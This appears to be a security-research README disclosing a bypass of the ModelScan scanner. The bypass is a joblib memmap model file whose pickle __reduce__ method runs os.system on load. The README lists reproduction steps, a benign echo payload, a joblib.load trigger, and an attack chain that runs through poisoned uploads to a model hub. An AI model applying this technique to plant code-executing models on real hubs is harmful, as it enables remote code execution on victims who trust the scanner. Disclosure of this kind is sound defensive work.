| # ModelScan Bypass - Memory-Mapped Array ⭐ PRIMARY FINDING | |
| **Security Research - ModelScan Bypass Technique** | |
| ## Overview | |
| This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, | |
| a popular ML model security scanner. This technique allows malicious pickle-based model files | |
| to evade detection. | |
| ## Technique | |
| **Memory-mapped array bypass** | |
| Uses joblib's memmap feature with malicious __reduce__ method | |
| ## ModelScan Result | |
| **SCANNED but found NO ISSUES ✅ (TRUE BYPASS)** | |
| ## File | |
| - `exploit_memmap_bypass.joblib` | |
| ## Reproduction Steps | |
| ### Testing with ModelScan | |
| ```bash | |
| # Install ModelScan | |
| pip install modelscan | |
| # Download the exploit file from this repository | |
| # Then scan it | |
| modelscan scan -p exploit_memmap_bypass.joblib | |
| ``` | |
| ### Expected Result | |
| SCANNED but found NO ISSUES ✅ (TRUE BYPASS) | |
| ### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION) | |
| ```python | |
| import joblib | |
| # WARNING: This will execute arbitrary code! | |
| model = joblib.load('exploit_memmap_bypass.joblib') | |
| ``` | |
| ## Technical Details | |
| This exploit uses Python's pickle `__reduce__` method for RCE: | |
| ```python | |
| def __reduce__(self): | |
| import os | |
| return (os.system, ('echo "RCE executed!"',)) | |
| ``` | |
| **Why ModelScan misses this:** | |
| Uses joblib's memmap feature with malicious __reduce__ method | |
| ## Security Impact | |
| **Severity**: HIGH | |
| **Attack Vector**: | |
| 1. Attacker creates malicious model using this technique | |
| 2. Uploads to model hub (HuggingFace, etc.) | |
| 3. Victim downloads and scans with ModelScan | |
| 4. Scanner reports "No issues found!" or skips the file | |
| 5. Victim loads model → RCE | |
| ## Part of Larger Research | |
| This is one of four bypass techniques discovered: | |
| 1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch) | |
| 2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression) | |
| 3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header) | |
| 4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING | |
| ## Disclosure | |
| This research is being submitted to Huntr's bug bounty program for responsible disclosure. | |
| **Date**: December 25, 2024 | |
| **Researcher**: Security Research Team | |
| ## References | |
| - [Huntr Bug Bounty](https://huntr.com/) | |
| - [ModelScan GitHub](https://github.com/protectai/modelscan) | |
| ## Disclaimer | |
| ⚠️ **For Security Research Only** | |
| This file is provided for security research and vulnerability disclosure purposes only. | |
| Do not use this technique for malicious purposes. Loading this file will execute code. | |
| --- | |
| **Status**: Under responsible disclosure to Huntr bug bounty program | |